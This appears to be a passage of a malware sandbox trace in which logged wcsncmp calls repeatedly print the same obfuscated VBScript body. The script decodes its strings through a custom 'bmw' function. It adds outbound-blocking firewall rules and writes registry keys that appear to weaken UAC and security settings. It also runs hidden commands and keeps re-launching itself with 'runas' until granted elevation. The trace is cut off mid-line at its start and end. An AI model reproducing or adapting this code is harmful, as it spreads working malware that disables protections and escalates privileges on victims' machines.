newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0226.348] wcsncmp (_String1="hen\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 91 [0226.348] wcsncmp (_String1="en\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.348] wcsncmp (_String1="n\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0226.348] wcsncmp (_String1="\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = 